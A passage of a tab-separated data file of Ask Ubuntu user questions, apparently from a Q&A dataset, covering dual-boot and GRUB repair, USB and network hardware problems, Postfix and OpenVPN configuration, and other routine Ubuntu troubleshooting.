thing its confusing what will be my productid for this code 0154 ( which lsusb finds before modem gets detected by driver software ) ? or 2003 ( which lsusb finds after modem gets detected by driver software and find a cd-rom ) ? i think usb_modeswitch can help me solving this problem but i do n't know how to use usb_modeswitch or create configuration file with it . thats all . now my question is whats wrong ? is there any solution to get my modem detected by network-manager ?
308897	convert ubuntu physical machine to virtual machine	what is the easiest way to convert a physical ubuntu ( v. 10.04 ) into a virtual machine ? convert to vmware workstation image or virtualbox image
308898	wipe usb flash drive ubuntu	i have made a bootable usb drive with ubuntu installer and now i ca n't delete ubuntu from it . i tried to use gparted and erased the partition table , made a new ms-dos partition table and formatted the drive as fat32 . now the name of the drive is still ubuntu 13.04 amd64 and a couple of files and folders from ubuntu installer are still there ( eg : wubi.exe , boot and others ) . i ca n't delete them because it is read-only . i also tried the following : open terminal sudo fdisk /dev/sdb command : n partition type : p partition number : 1 now , the minimum value of the first sector is 2048 instead of 62 ( the drive has 62 sectors /track ) tried with 2048 as first and all remained the same as before . i need urgent help , any command or thing that might help . preferably not stuff like gutmann wipe : )
308899	hang after `` try ubuntu ''	just to start things of smooth , please be noted that i have extremely little foreknowledge of ubuntu , and operating multi ( dual ) boots . i have attempted to make a bootable usb for ubuntu 13.04 ( ubunt-13.04-desktop-1386 ) . i used the pendrivelinux universal usb installer program in order to make it bootable ( i 'm not sure how else to phrase that =.= ) . the problem is basically , when i boot my pc ( win xp home ) , tap f11 to choose to boot from usb , and once the os load up and gives me the option to either try and install , when i press `` try ubuntu '' the screen flash black , then loads up a background , a cursor , and nothing else . how can i resolve this issue ? the usb is formatted ntfs and is 32gb . many thanks people ( :
308911	is there something like tasker ( android ) for ubuntu	is there something like tasker ( android app for automating things ) for ubuntu 13.04 ( cuttlefish ruled out ) ?
308913	is it there a full movie editing software that i can get that has a chroma keyer ?	i am starting to get into the world of film making/editing . i tried to use imovie , but it just does n't have the functionality that i need . is there a good movie editing software that has a chroma keyer for free ?
308915	reformat a hard disk as if it were new ?	i have been using ubuntu 12.10 as a dual-boot on my primary computer , lately everything has become a bit unstable , steam games crash often , everything has been slowing down a lot . anyway , my computer came with 64bit windows , and i had 32bit ubuntu installed . my plan was to wait for portal 2 to come out , wipe the hard-disk , and install 64bit ubuntu , but because everything got a little unstable like i said before i decided to wipe it a little earlier , i will explain what i did in steps : copy all my data i want to keep to an external harddrive download 64bit ubuntu 13.04 and make a bootable usb-stick select the option : format harddrive and install ubuntu in the setup . after that was all done i could n't wait to restart my computer to feel the speed of a fresh install , but unfortunately ; my pc came up with an error saying there are no active partitions and running the hp diagnostics gave me a biohd-3 error . now , after doing some research i think it 's my mbr that is pointing to a partition that does n't exist anymore . i found something on the forums telling me to open grub in the terminal , so that it says grub > . the first command i would have to type was find /boot/grub/stage1 but that gave me a file not found error . i also tried the hp recoverydisks to fix the mbr and then reinstall linux but for some reason those just keep loading files and rebooting . so my question is : is there a way to reformat the drive and restore it as if i just bought it and took it out of the box , with an empty mbr and no partitions ? thanks in advance : )
308924	can not receive or send email from my email server ( iredmail ) what do i do ?	-- -system -- - acer aspire one zg5 cpu : intel atom n270 gpu : intel 945gse ram : 1.5 gb swap : 1.5 gb storage : 120 gb os : ubuntu 13.04 raring 32bit hi , i set up iredmail for my email server however port 25 is blocked by my isp thus i can not receive or send email from my server . i 'm not sure if this is the main reason , i believe it is . i figured i could use a smart host to send email but as for receiving email i do n't know . anyone know how i would get around this ?
308925	how can i connect an ouya gamepad ?	i would like to use the ouya controller with my ubuntu machine ... its a standard bluetooth controller and when i attempt to pair it with ubuntu 13.04 the pairing option box prompts me to enter a pairing code . now this is the odd part . the pairing code options dialog in the settings has a few options but none of the setting stick when closing the dialog ( there is no ok or apply , just `` close '' ) . so at the end of the day i am unsure if there is a simple way to pair bluetooth gamepads in ubuntu . tl ; dr : how do i pair a bluetooth gamepad without a paircode ?
308926	package ignore when running apt-get update	i 'm trying to install centrify express on ubuntu server 12.04 . i know there are several ways of doing this , but i 've found that the most straightforward way is to add the canonical archive repository and then apt-get install it . this has worked for me for the last 10 months or so on at least 12 systems . now after i added the repository and i run apt-get update , i see that the repository is ignored , and therefore i can not install centrify this way . this is the apt-get update line : ign http : //archive.canonical.com precise/partner translation-en_us ign http : //archive.canonical.com precise/partner translation-en why is it ignored , and is there actually a manual way of updating a specific repository ?
308937	can not install ubuntu in virtualbox due to `` this kernel requires an x86-64 cpu , but only detects an i686 cpu , unable to boot '' error	i was trying to install ubuntu 12.04 in virtualbox 4.2.12r84980 . i see this kernel requires an x86-64 cpu , but only detects an i686 cpu , unable to boot but i am using a 64 bit windows 8 , and trying same .iso for trying ubuntu . then what is the problem ?
308938	internet works with ip address but not with website name	i just installed ubuntu on my laptop . i ca n't ping or open a site with it 's name but everything works fine when i use ip address . i already tested a few ways like disabling ipv6 , changing dns server and changing some configuration in firefox .
308939	how to reset default permissions for /etc ?	by mistake i have made permission changes for /etc . now it 's giving me the following error message : bash : /etc/bash.bashrc : permission denied i have no name ! @ chandan-inspiron-5520 : ~ $ sudo /etc/init.d/apache2 restart sudo : unable to stat /etc/sudoers : permission denied sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin
308940	ca n't access my raring installation after adding a quantal install	i use kubuntu 13.04 . the other day i installed ubuntu ( unity ) 12.10 on a small partition on my laptop as i needed to test something out . my data from the kubuntu install is intact , but strangely bundled up and i am not familiar with what 's going on . a picture speaks 1000 words , here is my kubuntu install in nautilus : can anyone tell me what 's going on and if there is a way to restore my kubuntu install ? the quantal install is unimportant to me as it 's served its purpose .
308941	asus : k55v series laptop dual boot problem	i have laptop asus k55v ( windows 7 home 64bit ) ( i 'd like to dual boot with ubuntu ) i read all the tutorials about install ubuntu , here 's what i did : installed old version ( problem : there some some windows partitions and i can format some of them ) ( backtrack 5r3 wo n't boot ) i download the latest ubuntu . i have boot option set as uefi/efi . i then ran grub and ubuntu worked . ( problem : grub ca n't boot into windows ( problem 2 : windows updated and now grub ca n't find the partition ) i now ca n't turn off uefi/efi even looking at the same tutorial . my question is : how to install ? or how to turn off boot uefi/efi on my pc ? i have a efi partition , could that cause a problem ? .
308947	how to get original system command after overwriting it with a function ?	i 'm at a hackathon right now so if someone would answer this soon , you 'd be doing me a huge favor . i 've written a function called ls ( ) in my .bashrc that looks like this : ls ( ) { if ( some condition ) ; do something else ls ; # ( call to original ls system call ) fi } but here when it goes to the else part , it just enters an infinite loop how can i call the original ls system call in else or , how can i make ls behave differently in one folder and normally in the others .
308949	gedit 3.6.1 , how to increase the number of recent files from its default of 5 ?	ubuntu 12.10 , gedit 3.6.1 this wo n't work : gconftool-2 -- type int -- set /apps/gedit- /preferences/ui/recents/max_recents 30 modifying this file as root wo n't work either : cat /usr/share/glib-2.0/schemas/org.gnome.gedit.gschema.xml |grep rece -c 1 edit : there is nothing at gconf-editor either . is it hard coded ? in order to increase the number of recent files in gedit from its default of 5 will i need to find , `` fix '' and recompile gedit with the answer here ?
308950	ubuntu 13.04 is there a way to make steremix same as windows ?	hello guys i am searching if there a way to stream the computer sound to microphone , another microphone than the default one . for example make people at skype hear what i hear .
308952	how to save settings ?	i am a complete newbie to ubuntu . when i try to adjust my touchpad pointer speed , and quit , it does not save the changes . is there a way i am supposed to save ? again , i am a complete noob . did i do something wrong creating the usb ?
308958	ubuntu 12.04 dell 6400 no network	i have just installed ubuntu 12.04 . my network is not working : no wireless , no cable network . there are some posts on forums about it , however i was not able to fix it . it is possible to turn off wireless on my laptop by using the keyboard combination fn+f2 , but how do i check if it is running ? i have found a post with commands to give some info about this problem . please help , i 'm not able to fix it . marta @ martapc : ~ $ lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) 0b:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) marta @ martapc : ~ $ lsusb bus 003 device 002 : id 1bcf:053a sunplus innovation technology inc. targa silvercrest omc807-c optische funkmaus bus 005 device 002 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 003 : id 413c:8126 dell computer corp. wireless 355 bluetooth bus 005 device 004 : id 0a5c:4502 broadcom corp . keyboard ( boot interface subclass ) bus 005 device 005 : id 0a5c:4503 broadcom corp . mouse ( boot interface subclass ) marta @ martapc : ~ $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:912 errors:0 dropped:0 overruns:0 frame:0 tx packets:912 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:75104 ( 75.1 kb ) tx bytes:75104 ( 75.1 kb ) marta @ martapc : ~ $ iwconfig lo no wireless extensions . marta @ martapc : ~ $ sudo lshw -c network [ sudo ] password for marta : *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:16 memory : efdfc000-efdfffff *-network unclaimed description : ethernet controller product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 resources : memory : ef9fe000-ef9fffff marta @ martapc : ~ $ lsb_release -d description : ubuntu 12.04.2 lts marta @ martapc : ~ $ uname -mr 3.5.0-23-generic i686
308964	postfix is timed out while sending	i have just set up postfix ( with tasksel install mail-server ) with the default settings . unfortunately , i can not send e-mails from by smtp server . here is my main.cf : # see /usr/share/postfix/main.cf.dist for a commented , more complete version # debian specific : specifying a file name will cause the first # line of that file to be used as the name . the debian default # is /etc/mailname . # myorigin = /etc/mailname smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no # appending .domain is the mua 's job . append_dot_mydomain = no # uncomment the next line to generate `` delayed mail '' warnings # delay_warning_time = 4h readme_directory = no # tls parameters smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination myhostname = mydomain.tld alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = mydomain.tld , pc-01 , localhost.localdomain , localhost relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_command = procmail -a `` $ extension '' mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all inet_protocols = all where mydomain.tld is my domain ( surprise , surprise ... ) . i have checked /var/log/mail.log and it 's keep saying : jun 16 20:38:59 pc-01 postfix/smtp [ 12967 ] : connect to mta5.am0.yahoodns.net [ 66.196.118.37 ] :25 : connection timed out i have also googled the whole night about this problem and others said it could be caused by the isp since they are blocking port 25 . i have checked it online , but i think they are not . ( how can i make sure ? ) so i would be greatful if you could help me .
308965	how to start from zero	i 've had ubuntu for a couple years but i did n't use it much [ also i forgot most of the passwords ] so i was wondering how to delete all my files and profiles and just start from the beginning . i 'm not the best with computers so any help will be appreciated . thanks .
308968	how can i run a command from a qml script ?	i 'm working on an ubuntu touch app that needs to modify iptables and do various other things that requires interaction with the command line . i found this and i understand that it must be done with a c++ plugin or a possible future extension in the sdk . is there any such extension available now ? and can someone elaborate on how i can use c++ to run a command from qml ?
308971	where do i find the sofware omnis after downloading	i went to omnis site and clicked omnis downloads ( linux ) . download the latest omnis studio products , installers , patches and component updates . after 119mb download there is nothing about omnis in the hud or icon bar at left . where do i find it to run the software ? i use ubuntu 13.04 .
308982	two finger scrolling does not work with ubuntu 13.04	i have a dell inspiron 5720 . i recently installed ubuntu 13.04 . my touch pad scrolling with two fingers , zooming with a pinch etc does not work . it works fine with my windows 7 . i do n't have a two-finger scrolling option in my mouse and touchpad tab of system settings . i tried to follow this post . http : //askubuntu.com/questions/291143/ubuntu-13-04-touchpad-option-not-exists but i dont see a dkms directory within my lib folder to do a cd /var/lib/dkms/psmouse/ how should i fix this ?
308983	installing imagemagick for c ( ++ ) on ubuntu 12.10	i 'm having a hard time installing the imagemagick software for ubuntu 12.10 . so , i want the c and c++ api , not much more . now when i go to imagemagick.org , they have a binary package for unix , namely an rpm . when i download and launch it , rpm complains that firstly i should be using alien , and secondly there are like 10000 missing dependencies . if i use alien to create a deb file , and the install it via the software center , the package does indeed install , but only the command line interface - no includes , anything . same with apt-get imagemagick . ( btw - wtf , they do n't have support for ubuntu ? ) i tried compiling from source ( which i shoud n't be doing anyway - i 'm not expecting much customization am i ? ) , and then the includes are present , but the programs wo n't compile complaining about `` undefined reference '' and then a list of everything that is n't pure c ( and i 'm using the command imagemagick.org told me to use , namely cc -o wand pkg-config -- cflags -- libs magickwand wand.c ) so clearly i 'm doing something wrong . any help would be much appreciated .
308988	i can connect to my web server with my internal ip , but not my external ip ?	i have recently installed a webserver , and port 80 is open . i can connect with 127.0.0.1 and 192.168.0.50 , but i ca n't with my external ip . so , why is this ? i use a router from ubee .
308990	battery reduced by 50 % > how to make my battery last longer than windows 7 for hp pavilion g7 ?	i have a hp pavilion g7-1204sa 17.3 inch laptop pc amd quad-core a6-3400m processor , ram 6gb . i am attempting to make my laptop to last longer on lubuntu or ubuntu os than windows 7 . it currently only lasts about 1 hour and 43 minutes on lubuntu and that 's pretty bad as windows 7 can last for 4 hours . i was wondering if it is possible if there are any tools fixes or updates to the kernel/ graphics software to make it last longer . i have noticed that the fan is working too hard and is heating up when under no stress what so ever . i would also like to know if there are any specific updates , software or ppa 's to my computer specs to make the battery last longer . any suggestions or experiences would be helpful , i am looking for fixes specifically to my laptop or to the specs of my laptop . this is not a duplicate as there are no questions on ask ubuntu that are hp g series .thank you .
308991	how do i make ubuntu the default partition ?	recently i asked this question and it was marked as a duplicate and not correctly answered . i was even referred to this link which does not address what i am questioning about ... how to uninstall windows ? i recently installed ubuntu , which instead of eliminating windows , it partitioned it . my question is first how to make ubuntu my default os ( or partition ) ? this is not the grub i am talking about , rather the partitions you have to chose between before you enter the grub . right now if i am not right at the computer when the partitions windows xp and ubuntu pops up , it will automatically go to windows . i want it to automatically choose ubuntu instead . the grub is here it goes to once i enter the ubuntu partition . the settings there is fine . i need it to open upuntu automatically.how do i do that . sorry , i ca n't explain it better then that , im not as knowlegable as y'all . if this has actually been asked , i would like to find the answer that will actually solve my problem so i can move on . thanks for your help . if this is a duplicate , how do i do the changes that i am asking . the link you have does not tell me how to get to that point that i see . as i said i am a novice and need clearer answers .
308993	run script at boot/startup in ubuntu 12.04 x64 server	i am trying to start the ror application named fedena . what i generally do is ssh login as rootand hit these commands root @ cloud : ~ # cd fedena root @ cloud : ~/fedena # script/server = > booting webrick = > rails 2.3.5 application starting on http : //0.0.0.0:7800 and so on ... meaning the app server is running then when i close the ssh session , the application ends . now , what i figured out was for keeping it alive was to run this shell script through webmin interface and it survived . but , i wanted to autorun this script on every boot/restart . i tried to add ./fedena/script/server before the exit 0 line in the /etc/rc.local alas ! it did n't work . why i do n't understand .
308994	what visual style is this and how do i install it ?	you can find my question in the title . the video , where i saw that visual style is the following : http : //www.youtube.com/watch ? v=padg62ocsxg and the only thing i am interested in , is the visual style and how i can install it . it would be really nice , if i would get an correct answer very fast .
308995	how to restore cairo dock switcher	i somehow managed to hide my cairo dock switcher and i ca n't seem to get it back . is there a way for me to re-download the applet without re-installing cairo dock ?
309006	various problems upon boot	i installed ubuntu 12.04 32-bit on an asus eee pc with 160g hdd and 2gib ram . it ran fine for two days , then today , when i booted up my computer , my color scheme had changed . the top bar on my screen was clear not black , the software center and all the loading windows are blue and silver and not orange and purple . there 's more , two folders went missing off my desktop , multiple programs such as wine and q4wine were uninstalled , synaptic and audacity refused to open and startup disk creator errors constantly . i uninstalled synaptic and the usc wo n't let me re-install it , the update manager wo n't let me access software sources , the software center wo n't let me access software sources either . i really wish i knew what was going on , as i have had none of these problems on any of my other ubuntu machines , and they all literally happened overnight while i was sleeping .
309008	unity scope does n't search contacs	i migrated from gnome 3.x to unity , the one thing i miss is the contact search from gnome . mine online contacts google and facebook are successful synced with online accounts . when i looked in gnome contacts there was nothing synced ? also i can not use unity dash to search my contacts . anyone with an solution ? sorry for the mediocre english its not my mother tongue .
309009	no way to update evolution ?	i am using ubuntu 13.04 unity and would like to update evolution to the latest release . it seems quite difficult as there seems to be no ppa . or is there ?
309010	why ca n't i see my wireless router a d'link dir 615 - ubuntu 12.04 ? i can see all the other active wireless connections .	details : i have a d'link dir 615 router that i have been using for 3 years with ubuntu 11.10 - with no problems . i have a dell inspiron 15r with dual boot of windows 7 and now , ubuntu 12.04 - after a system wipe and re-install of both os . i can see all wireless connections active including mine on windows 7 . i can connect with no problems here . however , on ubuntu 12.04 i can connect through the router using a wired dhcp connection but when i try to connect via wireless connection , it fails to even find my router and network . it seems to be able to find all other active wireless connections in the vicinity . please help - i am switching to wired connection whenever i am using ubuntu : ' (
309014	change windows boot order from within ubuntu	so i just switched over to ubuntu . i used easybcd to choose between linux mint and windows 7 before the switch . i now have it set up for a dual boot . when the installation was finished , i logged into windows and updated the boot information in easybcd . i deleted the linux mint option , and added ubuntu . when i restarted my computer , my options were linux mint and ubuntu , both of which bring me to the ubuntu grub loader . easybcd deleted the wrong option , and now i ca n't get back into windows . if i choose `` ubuntu , '' it takes me to the grub loader , and the windows 7 option at the bottom of that just throws me back to the easybcd menu . i was wondering if there is a way to fix this without completely reinstalling windows .
309018	brightness adjustment crashes 13.04	i 'm using ubuntu 13.04 64 bit on a dell studio 1558 with a ati/amd 5400 series graphics card running the amd 13.4 graphics drivers and sometimes when i try to adjust the screen brightness , the entire system crashes . sometimes the screen goes nuts and displays an array of different coloured blocks . is anyone experiencing the same issue or know how to fix it ? thanks for your time .
309022	grub rescue on mac after partition resize	ok , i 've read a few posts about that , but either the people who wrote had a dual-boot windows/ubuntu , or i did n't understand the solution in the end ... anyway i 'm just too scared of doing something wrong at this level , so here is the situation : what happened i had an imac with refit installed and a dual boot with ubuntu 12.04 . i went on mac , and decided to free some space for ubuntu , so i just shrunk the mac partition cutting off 30gb at the end ( free space ) , that 's all , and all was well . at least that 's what i thought.. what 's the current situation now i can still boot on mac , but when i try to boot on ubuntu i get a error : unknown filesystem with the grub rescue > prompt . i followed what i read on the forum to boot on ubuntu : set root= ( hd0,3 ) set prefix= ( hd0,3 ) /boot/grub insmod normal normal and this works well , but it 's not a long term solution . i heard about bootrepair , but i 'm on mac , and from what i 've seen , all the options of this software are for mbr , not efi ... my opinion from what i understand i need to tell efi where to `` redirect the bootloader '' when i select the linux option in the refit menu . ca n't i do that from osx directly ? or is it just grub that 's messed up ? if i have to use a liveusb , please explain me what to do as if i was dumb , i really do n't want to mess things up more ... : s
309024	keyboard shortcuts with multiple non-modifier keys	is there any way to use a combination of keys such as : ctrl+spc+j as a shortcut in ubuntu ? note that the combination above includes two non-modifier keys : spc and j . as an example , i would like to map use the above combination for `` move window one workspace to the left ''
309033	unattended-upgrades sends attachment instead of text	i 'm trying to setup automatic security updates on ubuntu server 12.04 lts with an email response : sudo apt-get install unattended-upgrades sudo dpkg-reconfigure unattended-upgrades # answered yes the upgrades work , but i get the following email : subject : unattended-upgrades result for 'ubuntu ' with an empty body and the attachment of unattended-upgrades result for 'ubuntu'.dat opening the .dat file in a text editor shows everything , but i 'd like to just have this as the body here is contents of /etc/apt/apt.conf.d/50unattended-upgrades // automatically upgrade packages from these ( origin : archive ) pairs unattended-upgrade : :allowed-origins { `` $ { distro_id } : $ { distro_codename } -security '' ; // `` $ { distro_id } : $ { distro_codename } -updates '' ; // `` $ { distro_id } : $ { distro_codename } -proposed '' ; // `` $ { distro_id } : $ { distro_codename } -backports '' ; } ; // send email to this address for problems or packages upgrades // if empty or unset then no email is sent , make sure that you // have a working mail setup on your system . a package that provides // 'mailx ' must be installed . unattended-upgrade : :mail `` cron @ mydomainname.com '' ; everything else is commented out
309036	ubuntu touch and iphone	why can^t we install ubuntu touch on iphone ? if we can please let me know what is the way for it . already we are running ubuntu on mac : ) thanks in advance
309044	installing chromium extensions : an error has occurred : could not create download directory	when i try to install an extension from the chrome web store i get this error : `` could not create download directory '' . any idea how i can find out which directory it 's trying to create ? i 've tried launching with strace -e trace=file chromium-browser & but that gave nothing helpful .
309047	how do i find out what filesystem my partitions are using ?	i am trying to troubleshoot why ubuntu wo n't save my settings . is there a way to find out what filesystem my partitions are using ?
309049	boot from a mounted .iso ?	my installation of ubuntu on my poweredge is very messed up . i need to reinstall ubuntu , but my cd-drive is broken , and these machines do n't boot off of usb 's ! is there any way i can mount ubuntu 12.04 as an iso and boot off of that ?
309051	burn 1 to 1 copy of a dvd	i know that i can use brasero to normally burn a dvd from an iso . but here is my issue , i am backing up my dvd collection and when i use brasero to rip a dvd i turn it into an iso that is 7.0gb or larger . sadly blank dvd 's are only 4.7 gb . my question is how do i use brasero to create a hadrcopy back up of a dvd , do i need to use a dual layer disk or is there a program out there that will compress the size down to dvd size ? simply put how do i make a back up of one of my dvd 's ?
309056	openvpn - routing issue	server : ubuntu 11 ( openvz vps ) client : windows 7 issue : clients connect successfully to vpn , but loss of internet access once inside the vpn . facts : everything mostly defaults is a routing/networking problem . iptables is virgin . 100 % no other active daemons/services ( just vpn port listening ) i 've googled in search of answers for hours , 12 result pages deep . outputs of commands from the server : /etc/sysctl.conf net.ipv4.ip_forward=1 /etc/openvpn/server.conf port xxxx proto udp dev tun ca myca.crt cert server.crt key server.key dh dh1024.pem server 10.8.0.0 255.255.255.0 push `` redirect-gateway def1 bypass-dhcp '' keepalive 10 120 cipher aes-128-cbc max-clients 8 log-append openvpn.log persist-key persist-tun verb 9 netstat -rn gateway genmask flags mss window irtt iface 10.8.0.2 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 10.8.0.0 10.8.0.2 255.255.255.0 ug 0 0 0 tun0 0.0.0.0 0.0.0.0 0.0.0.0 u 0 0 0 venet0 /etc/network/interfaces auto lo iface lo inet loopback auto venet0 iface venet0 inet manual up ifconfig venet0 up up ifconfig venet0 127.0.0.2 up route add default dev venet0 down route del default dev venet0 down ifconfig venet0 down iface venet0 inet6 manual up route -a inet6 add default dev venet0 down route -a inet6 del default dev venet0 auto venet0:0 iface venet0:0 inet static address xxx.xxx.xxx.xxx netmask 255.255.255.255 auto venet0:1 iface venet0:1 inet static address xxx.xxx.xxx.xxx netmask 255.255.255.255 netstat -a gre0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 noarp mtu:1476 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : : scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) venet0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:127.0.0.2 p-t-p:127.0.0.2 bcast:0.0.0.0 mask:255.255.255.255 up broadcast pointopoint running noarp mtu:1500 metric:1 rx packets:217 errors:0 dropped:0 overruns:0 frame:0 tx packets:175 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:23259 ( 23.2 kb ) tx bytes:29368 ( 29.3 kb ) venet0:0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr : xxx.xxx.xxx.xxx p-t-p : xxx.xxx.xxx.xxx bcast:0.0.0.0 mask:255.255.255.255 up broadcast pointopoint running noarp mtu:1500 metric:1 venet0:1 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr : in.ter.net.address p-t-p : in.ter.net.address bcast:0.0.0.0 mask:255.255.255.255 up broadcast pointopoint running noarp mtu:1500 metric:1 solutions , ideas ?
309057	wired/wireless connections	i have a wireless router in the far side of my house , and i have a desktop machine with ubuntu 13.04 connected to it via wireless . the desktop is set up as a media server . i have a cat 6 cable running from the desktop to a wired router , and then another cat6 running from the router to another machine connected to my television for streaming my movies , and tv shows . i have wlan0 on auto-connect , and eth0 on manual connect . when i connect eth0 to stream movies i lose internet from wlan0 . my question is , how do i stream my movies from eth0 and still keep my internet up on wlan0 , or is it possible ? thanks to all that respond .
309060	how can i update gwibber to work with twitter api v1.1 ?	twitter deprecated v1.0 of their api on tuesday and i 'm curious to know if i can update gwibber to work with the new api ( given gwibber 's twitter function has stopped working ) . would appreciate some assistance . thanks in advance !
309061	touchpad disable after screen unlock	i am running ubuntu 12.04.2 lts and i had thought i had permanently disabled the touch pad by updating system settings to reflect my preferences running a one time 'gsettings set org.gnome.settings-daemon.peripherals.mouse middle-button-enabled true' running 'xinput set-prop 12 `` device enabled '' 0 ' in my $ home/.bashrc this setup works fine , when i lock the screen and unlock it . however , after my session gets suspended because of inactivity followed by unlock of the screen , the touch pad is no longer disabled . attempt to launch the app touchpad-indicator ( version 0.8.1.1-1ubunt ) as a possible remedy crashes at startup . is there a better solution than , rerunning xinput set-prop 12 `` device enabled '' 0 every time i log into my session after a suspend ?
309071	a catch-22 situation with apt-offline	i am installing ubuntu 12.04 onto a hp 1u rack server that is in a lab with no internet connection . i need to install php , nginx and other packages so that i can run my web app on it that will serve internal clients . i tried to run apt-offline set /media/usb/updates.sig but the server prompts me to install apt-offline instead . what should i do to install the packages i want and keep the server up to date if it is not connected to the internet ?
309074	accidentally deleted /etc/ - what can i do ?	i have accidentally deleted /etc/ folder . apart from being completely stuffed , what options do i have ?
309076	how to redirect to axel when downloading and converting it via video downloadhelper	how do i redirect my download in axel when i am downloading and converting it via video downloadhelper . in my currect setting in firefox , i downloaded video downloadhelper and flashgot plugin . my problem is that when i want to download and convert it to mp3 vidown downloadhelper uses built-in downloader even i already selected axel as default downloader in its settings . thanks in advance : )
309082	how to run `gsettings set` in chroot ?	i ran the following command in chroot environment without x : gsettings set org.gnome.desktop.a11y.applications screen-reader-enabled true i get the following error message : ( process:8290 ) : warning ** : command line `dbus-launch -- autolaunch=09be9504960407430fb3a253000052a5 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : no protocol specified\nno protocol specified\nautolaunch error : x11 initialization failed . is x a must for changing gsettings ? is there another way to change the setting ? ( my purpose is to make a livecd iso with screen reader enabled by default ) thanks !
309083	updating ubuntu but come across error	i was trying to update my ubuntu from 12.10 to 13.04 via command line ( update manager was n't displaying the new release ) . however , right after i ran sudo do-release-upgrade , the command line gave me this : checking for a new ubuntu release traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 145 , in < module > fetcher.run_options += [ `` -- mode= % s '' % options.mode , attributeerror : type object 'distupgradefetchercore ' has no attribute 'run_options' how do i fix this ? thanks !
